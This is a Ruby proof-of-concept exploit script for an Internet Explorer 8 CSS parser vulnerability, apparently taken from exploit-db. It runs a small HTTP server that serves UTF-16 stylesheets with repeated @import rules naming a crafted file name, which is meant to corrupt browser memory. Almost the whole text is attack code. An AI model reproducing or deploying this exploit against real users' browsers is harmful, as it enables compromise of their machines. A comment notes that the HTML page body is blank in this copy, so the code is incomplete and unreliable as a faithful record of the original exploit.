Internet Explorer 8 CSS Parser Exploit Code

#!/usr/bin/env ruby 
  
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
  
require 'socket'
require 'time'
   
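def http_send(sock, data, opts={})
    # Writes a minimal HTTP/1.1 response carrying `data` to `sock` and echoes
    # the raw response to stdout, one line per "[+] Sending:" entry.
    #
    # opts (all optional, unknown keys are ignored):
    #   :code    status code string, default "200"
    #   :message reason phrase, default "OK"
    #   :type    Content-Type value, default "text/html"
    #   :date    Date header value, default: the current time in RFC 1123 form
    #            (Time#httpdate, from the 'time' stdlib)
    #
    # Returns true when the write succeeded, false when it failed because the
    # stream is closed or the peer went away (IOError / SystemCallError).
    # Any other exception propagates.
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html",
                :date=>Time.now.httpdate}
    opts = defaults.merge(opts)
    body = data.to_s

    # Content-Length is a byte count. Using String#length here would be wrong
    # for any body with multi-byte characters: the client would either wait for
    # bytes that never arrive or truncate the body.
    headers = [
        "HTTP/1.1 #{opts[:code]} #{opts[:message]}",
        "Date: #{opts[:date]}",
        "Cache-Control: no-cache",
        "Content-Type: #{opts[:type]}",
        "Pragma: no-cache",
        "Content-Length: #{body.bytesize}"
    ]
    to_send = headers.join("\r\n") + "\r\n\r\n" + body

    puts "[+] Sending:"
    to_send.split("\n").each { |line| puts "    #{line}" }

    begin
        sock.write(to_send)
    rescue IOError, SystemCallError
        # Closed stream, EPIPE, ECONNRESET: the caller treats this as
        # "connection gone" and drops the client.
        return false
    end
    true
end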
   
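def sock_read(sock, out_str, timeout=5)
    # Waits up to `timeout` seconds for `sock` to become readable, then reads
    # up to 1024 bytes into `out_str` (in place, via String#replace) and echoes
    # them to stdout under "[+] Received:".
    #
    # Returns true when data was read. Returns false, and closes `sock`, when
    # the wait times out or the peer has hung up (recv yields an empty
    # string). Returns false, without closing `sock`, on a StandardError from
    # select/recv. Interrupt and SystemExit are deliberately not rescued so
    # Ctrl-C and exit() still stop the server.
    ready = Kernel.select([sock], [], [], timeout)
    unless ready
        sock.close
        return false
    end

    chunk = sock.recv(1024)
    if chunk.nil? || chunk.empty?
        # An empty read after select reported readability means EOF: the
        # client closed its side, so there is nothing further to serve.
        sock.close
        return false
    end

    out_str.replace(chunk)
    puts "[+] Received:"
    out_str.split("\n").each { |line| puts "    #{line}" }
    true
rescue StandardError
    false
end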
   
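def to_uni(str)
    # Expands every byte of `str` to the two-byte big-endian pair (0x00, byte),
    # i.e. the UTF-16BE form of a one-byte-per-character string. Bytes above
    # 0x7F are copied through unchanged, so the output is only meaningful
    # UTF-16BE for ASCII/Latin-1 input. Returns a new binary (ASCII-8BIT)
    # String; an empty or nil input yields "".
    str.to_s.each_byte.flat_map { |b| [0, b] }.pack("C*")
end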

   
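# Name under which the stylesheet is requested, as published with this
# proof-of-concept. It is kept verbatim; the placeholder below stands in for
# it inside the heredocs so they stay printable.
@css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"
@html_name = "test.html"
# ASCII stand-in with the same UTF-16 byte length as @css_name (to_uni
# doubles every byte, so half the length in characters).
placeholder = "a" * (@css_name.length/2)

# NOTE(review): the body of this heredoc is blank in the copy reviewed here;
# it appears to have been stripped when the page was rendered, so the served
# HTML page is effectively empty. Its original content cannot be recovered
# from this source.
@html = <<-HTML
     
HTML
# Prefix a UTF-16BE byte-order mark, expand to two bytes per character, then
# swap the encoded placeholder for the real stylesheet name.
@html = "\xfe\xff" + to_uni(@html)
@html.gsub!(to_uni(placeholder), @css_name)

# Stylesheet body: four @import rules pointing at the placeholder name.
@css = <<-CSS
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
@import url("#{placeholder}"); 
CSS
@css = "\xfe\xff" + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)

# Plain-text index: just the HTML file name.
@index = <<-INDEX
#{@html_name} 
INDEX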
   
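# Request matcher for the HTML page; built once rather than per request.
html_re = /GET.*#{Regexp.escape(@html_name)}/

# Serve the three resources on TCP port 55555. TCPServer.open with only a
# port binds every interface, so anything that can reach the host can fetch
# these files and, via a request containing "QUIT", stop the server; run it
# on an isolated test network. Per connection: read a request, answer it,
# then keep reading until the client goes quiet (5 s) or disconnects. The
# client socket is always closed, even when a read fails or exit() fires.
TCPServer.open(55555) do |srv|
    loop do
        cli = srv.accept
        req = ""
        begin
            if sock_read(cli, req, 5)
                until req.empty?
                    if req.include?("GET")
                        if req.match?(html_re)
                            break unless http_send(cli, @html, :type=>"text/html")
                        elsif req.match?(/GET.*index/)
                            break unless http_send(cli, @index)
                        else
                            # Every other GET, the stylesheet request included,
                            # receives the CSS.
                            break unless http_send(cli, @css, :type=>"text/css")
                        end
                    elsif req.include?("QUIT")
                        exit
                    end
                    req = ""
                    # sock_read leaves req empty on timeout/EOF, so the loop
                    # would end anyway; break makes that explicit.
                    break unless sock_read(cli, req, 5)
                end
            end
        ensure
            # sock_read may already have closed the socket on timeout/EOF.
            cli.close unless cli.closed?
        end
    end
end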

Link:http://www.exploit-db.com/exploits/15746/
